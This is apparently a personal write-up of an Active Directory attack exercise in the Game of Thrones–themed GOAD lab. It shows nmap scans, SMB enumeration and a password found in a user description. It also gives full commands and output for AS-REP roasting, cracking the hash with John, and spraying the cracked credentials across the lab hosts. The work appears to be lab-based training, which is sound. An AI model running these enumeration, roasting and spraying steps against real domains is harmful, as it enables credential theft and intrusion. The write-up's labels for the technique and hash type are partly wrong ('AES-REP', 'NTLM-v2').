Enumerate Network

We’ll start enumerating the network

Nmap Scanning the whole AD range

list of IPs assigned to VMs

IP address assigned / configured to each machine/s at the time of LAB deployment.

  1. 172.16.100.50 - DC-01 kingslanding.sevenkingdoms.local
  2. 172.16.100.51 - DC-02 winterfell.north.sevenkingdoms.local
  3. 172.16.100.52 -DC-03 meereen.essos.local
  4. 172.16.100.22 -SRVC-02 castelblack.north.sevenkingdoms.local
  5. 172.16.100.23 -SRVC-03 braavos.essos.local

SCR-20241208-pnsv.png

Scan results from kingslanding.sevenkingdoms.local [172.16.100.50]

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 07:50 EST
Nmap scan report for 172.16.100.50
Host is up (0.0010s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-02 17:20:32Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2024-10-28T15:04:14
|_Not valid after:  2025-10-28T15:04:14
|_ssl-date: 2024-12-02T17:21:21+00:00; +4h29m58s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2024-10-28T15:04:14
|_Not valid after:  2025-10-28T15:04:14
|_ssl-date: 2024-12-02T17:21:21+00:00; +4h29m58s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2024-10-28T15:04:14
|_Not valid after:  2025-10-28T15:04:14
|_ssl-date: 2024-12-02T17:21:21+00:00; +4h29m58s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-02T17:21:21+00:00; +4h29m58s from scanner time.
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:kingslanding.sevenkingdoms.local
| Not valid before: 2024-10-28T15:04:14
|_Not valid after:  2025-10-28T15:04:14
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SEVENKINGDOMS
|   NetBIOS_Domain_Name: SEVENKINGDOMS
|   NetBIOS_Computer_Name: KINGSLANDING
|   DNS_Domain_Name: sevenkingdoms.local
|   DNS_Computer_Name: kingslanding.sevenkingdoms.local
|   DNS_Tree_Name: sevenkingdoms.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-12-02T17:21:11+00:00
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local
| Not valid before: 2024-10-27T13:04:51
|_Not valid after:  2025-04-28T13:04:51
|_ssl-date: 2024-12-02T17:21:21+00:00; +4h29m58s from scanner time.
MAC Address: BC:24:11:7B:95:CB (Unknown)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-12-02T17:21:12
|_  start_date: N/A
|_clock-skew: mean: 4h29m58s, deviation: 0s, median: 4h29m57s
|_nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:7b:95:cb (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   1.02 ms 172.16.100.50

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.82 seconds

Scan results from winterfell.north.sevenkingdoms.local [172.16.100.51]

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 05:27 EST
Nmap scan report for 172.16.100.51
Host is up (0.00052s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-08 14:57:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2024-11-17T23:42:37
|_Not valid after:  2025-11-17T23:42:37
|_ssl-date: 2024-12-08T14:58:13+00:00; +4h29m59s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2024-11-17T23:42:37
|_Not valid after:  2025-11-17T23:42:37
|_ssl-date: 2024-12-08T14:58:13+00:00; +4h29m59s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-08T14:58:13+00:00; +4h29m59s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2024-11-17T23:42:37
|_Not valid after:  2025-11-17T23:42:37
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-08T14:58:13+00:00; +4h29m59s from scanner time.
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:winterfell.north.sevenkingdoms.local
| Not valid before: 2024-11-17T23:42:37
|_Not valid after:  2025-11-17T23:42:37
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local
| Not valid before: 2024-10-27T13:29:25
|_Not valid after:  2025-04-28T13:29:25
| rdp-ntlm-info: 
|   Target_Name: NORTH
|   NetBIOS_Domain_Name: NORTH
|   NetBIOS_Computer_Name: WINTERFELL
|   DNS_Domain_Name: north.sevenkingdoms.local
|   DNS_Computer_Name: winterfell.north.sevenkingdoms.local
|   DNS_Tree_Name: sevenkingdoms.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-12-08T14:58:03+00:00
|_ssl-date: 2024-12-08T14:58:13+00:00; +4h29m59s from scanner time.
MAC Address: BC:24:11:35:B3:38 (Unknown)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-08T14:58:04
|_  start_date: N/A
|_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:35:b3:38 (unknown)
|_clock-skew: mean: 4h29m59s, deviation: 0s, median: 4h29m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 172.16.100.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.59 seconds

Scan results from meereen.essos.local [172.16.100.52]

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 05:35 EST
Nmap scan report for 172.16.100.52
Host is up (0.00059s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-08 15:05:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:meereen.essos.local
| Not valid before: 2024-10-28T15:04:35
|_Not valid after:  2025-10-28T15:04:35
|_ssl-date: 2024-12-08T15:06:43+00:00; +4h30m00s from scanner time.
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ESSOS)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-08T15:06:43+00:00; +4h30m00s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:meereen.essos.local
| Not valid before: 2024-10-28T15:04:35
|_Not valid after:  2025-10-28T15:04:35
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:meereen.essos.local
| Not valid before: 2024-10-28T15:04:35
|_Not valid after:  2025-10-28T15:04:35
|_ssl-date: 2024-12-08T15:06:43+00:00; +4h30m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-08T15:06:43+00:00; +4h30m00s from scanner time.
| ssl-cert: Subject: commonName=meereen.essos.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:meereen.essos.local
| Not valid before: 2024-10-28T15:04:35
|_Not valid after:  2025-10-28T15:04:35
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=meereen.essos.local
| Not valid before: 2024-10-27T13:06:14
|_Not valid after:  2025-04-28T13:06:14
| rdp-ntlm-info: 
|   Target_Name: ESSOS
|   NetBIOS_Domain_Name: ESSOS
|   NetBIOS_Computer_Name: MEEREEN
|   DNS_Domain_Name: essos.local
|   DNS_Computer_Name: meereen.essos.local
|   DNS_Tree_Name: essos.local
|   Product_Version: 10.0.14393
|_  System_Time: 2024-12-08T15:06:34+00:00
|_ssl-date: 2024-12-08T15:06:43+00:00; +4h30m00s from scanner time.
MAC Address: BC:24:11:D6:47:02 (Unknown)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: Host: MEEREEN; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 4h23m19s, deviation: 20m00s, median: 4h29m59s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: meereen
|   NetBIOS computer name: MEEREEN\x00
|   Domain name: essos.local
|   Forest name: essos.local
|   FQDN: meereen.essos.local
|_  System time: 2024-12-08T16:06:34+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_nbstat: NetBIOS name: MEEREEN, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:d6:47:02 (unknown)
| smb2-time: 
|   date: 2024-12-08T15:06:34
|_  start_date: 2024-12-08T10:10:37

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 172.16.100.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.57 seconds

Scan results from castelblack.north.sevenkingdoms.local [172.16.100.22]

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 05:37 EST
Nmap scan report for 172.16.100.22
Host is up (0.00051s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-08T15:08:00+00:00; +4h29m59s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NORTH
|   NetBIOS_Domain_Name: NORTH
|   NetBIOS_Computer_Name: CASTELBLACK
|   DNS_Domain_Name: north.sevenkingdoms.local
|   DNS_Computer_Name: castelblack.north.sevenkingdoms.local
|   DNS_Tree_Name: sevenkingdoms.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-12-08T15:07:54+00:00
| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
| Not valid before: 2024-10-27T13:44:15
|_Not valid after:  2025-04-28T13:44:15
MAC Address: BC:24:11:24:FC:63 (Unknown)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-08T15:07:54
|_  start_date: N/A
|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:24:fc:63 (unknown)
|_clock-skew: mean: 4h29m58s, deviation: 0s, median: 4h29m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 172.16.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.90 seconds

Scan results from braavos.essos.local [172.16.100.23]

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 05:38 EST
Nmap scan report for 172.16.100.23
Host is up (0.00059s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-08T15:08:33+00:00; +4h29m59s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ESSOS
|   NetBIOS_Domain_Name: ESSOS
|   NetBIOS_Computer_Name: BRAAVOS
|   DNS_Domain_Name: essos.local
|   DNS_Computer_Name: braavos.essos.local
|   DNS_Tree_Name: essos.local
|   Product_Version: 10.0.14393
|_  System_Time: 2024-12-08T15:08:27+00:00
| ssl-cert: Subject: commonName=braavos.essos.local
| Not valid before: 2024-10-27T13:45:07
|_Not valid after:  2025-04-28T13:45:07
MAC Address: BC:24:11:25:64:C6 (Unknown)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 4h17m59s, deviation: 26m49s, median: 4h29m59s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: braavos
|   NetBIOS computer name: BRAAVOS\x00
|   Domain name: essos.local
|   Forest name: essos.local
|   FQDN: braavos.essos.local
|_  System time: 2024-12-08T16:08:27+01:00
| smb2-time: 
|   date: 2024-12-08T15:08:27
|_  start_date: 2024-12-08T10:09:55
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BRAAVOS, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:25:64:c6 (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 172.16.100.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.84 seconds

Recon with CrackmapExec:

┌──(root㉿kali)-[~/goad]
└─# crackmapexec smb 172.16.100.1/24
SMB         172.16.100.52   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         172.16.100.50   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         172.16.100.51   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         172.16.100.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         172.16.100.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)

Modifying the /etc/hosts file to update DNS

172.16.100.50 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding 172.16.100.51 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell 172.16.100.52 essos.local meereen.essos.local meereen 172.16.100.22 castelblack.north.sevenkingdoms.local castelblack 172.16.100.23 braavos.essos.local braavos

Enumerating with Enum4linux

Using Enum4linux against DC-02 WINTERFELL north.sevenkingdoms.local has given us a bunch of information, which contains usernames related to the specific domain.

arya.stark 
brandon.stark
hodor
jon.snow
jeor.mormont
rickon.stark
samwell.tarly
sansa.stark
sql_svc

Passwords in description:

SCR-20241208-sltp.png

Username: [samwell.tarly] Samwell Tarly Password: Heartsbane

Okay so far we got the usernames and password of one user. I’m making all the users into one file users.txt and passwords into passwords.txt. This can be helpful in the later part of the enumerations.

I tried to use the same username and password against the other machines in the network, but seems like there are two hosts that accepts this username and password.

SMB 172.16.100.23 445 BRAAVOS [+] essos.local\samwell.tarly:Heartsbane SMB 172.16.100.51 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane

Time to Roast

Doing an AES-REP-Roast with the found username and password has yielded an NTLM-v2 hash for the user brandon.stark.

└─# impacket-GetNPUsers -dc-ip 172.16.100.51 -request north.sevenkingdoms.local/samwell.tarly          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
Name           MemberOf                                              PasswordLastSet             LastLogon                   UAC      
-------------  ----------------------------------------------------  --------------------------  --------------------------  --------
brandon.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2024-10-28 13:08:08.297524  2024-12-08 16:09:49.777220  0x410200 



$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:0337620fe4ca6eea0a6eaf0203314f04$d7b5f362e906185ec1c7558c6df8de574aeeebd9107f730e1b2c0b8be5efa3f7a3777e16a1dadcf22724b67f1decef13f68c18077c72863c5109a05d6129ce3cf0c2be94b395f0b0d38076795cb00efae1fcc73e9390ca93ed5ba6d5bb684b163d6dccf23d9e936dc34a8e7ba726ba592e8b8a6ef0c71b4900d3539fa1a29efb465d11a6f1d8c82c010484d4ee0922fe895438dc9f7c88a9f042af4911f511d0f28f9cad09e5aff6afa22c2ca3c0cfcea1017887812d6eae1e68b89de4fd113338dbb11b06c7fe7a02a004578626f7e31be94e2d8c35abda940ea5641f52b8ac8ed6f39efafdf0ce67816723b185151c026325c7b2a893b73e3b42ae3f8fe0c69b067b754c06

Let’s also check in an other way if we are able to get the ntlm-v2 hash with out using the username and password:

─# impacket-GetNPUsers -no-pass -usersfile users.txt north.sevenkingdoms.local/             
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:ab113a7e42221cb8d00c614e2f934ce5$66275013bc56e1da2081c09eca574e915efbff0f857fa6273700ff2db27d4713cb94da46c0f0a9e658a20945197e66d264a6337276125fa9792d7292bba5b6b89bf0abb915c4d8dda816476475446f4f61a7171c1f1f61037dd4b5c2a81aee356feb45df0cf9678628e72d8103a186609f70752d3cacfede9755a38ab8deac9b9258e13c1ea0ab4bfd4f259f513a2a28467e31b9f2a1b8ad3d8e1216d3a2c0dadcafef03a47b4849daee45dd3a6d3f475d7e3c027ef1dda7f59421aeb1b59381d27b4a604d40c2757a665cf77a3f7cfb870750ecc652f2f3fb507a206eb6dd8e16e108767399d333c7f05c013ffb853ee918d46da9ab66ff6100da37139d98d27a2a25b14a7e
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set

Using hashcat or John to crack the hash.

└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iseedeadpeople   ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL)     
1g 0:00:00:00 DONE (2024-12-08 11:57) 16.66g/s 896000p/s 896000c/s 896000C/s 091803..ilovebrooke
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Username: brandon.stark Password: iseedeadpeople

Checking with crackmapexec with what hosts can brandon.stark can access I found he can access 3 hosts in the network.

└─# crackmapexec smb 172.16.100.1/24 -u Brandon.stark -p iseedeadpeople        
SMB         172.16.100.52   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         172.16.100.51   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         172.16.100.50   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         172.16.100.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         172.16.100.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         172.16.100.52   445    MEEREEN          [-] essos.local\Brandon.stark:iseedeadpeople STATUS_LOGON_FAILURE 
SMB         172.16.100.103  445    COMMANDO         [*] Windows 10 / Server 2019 Build 19041 x64 (name:COMMANDO) (domain:commando) (signing:False) (SMBv1:False)
SMB         172.16.100.51   445    WINTERFELL       [+] north.sevenkingdoms.local\Brandon.stark:iseedeadpeople 
SMB         172.16.100.50   445    KINGSLANDING     [-] sevenkingdoms.local\Brandon.stark:iseedeadpeople STATUS_LOGON_FAILURE 
SMB         172.16.100.23   445    BRAAVOS          [+] essos.local\Brandon.stark:iseedeadpeople 
SMB         172.16.100.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\Brandon.stark:iseedeadpeople 
SMB         172.16.100.103  445    COMMANDO         [-] commando\Brandon.stark:iseedeadpeople STATUS_LOGON_FAILURE 
Note: I tried using evil-winrm with the cracked credentials to login into all the three machines but not success.

Pasted image 20241208225806.png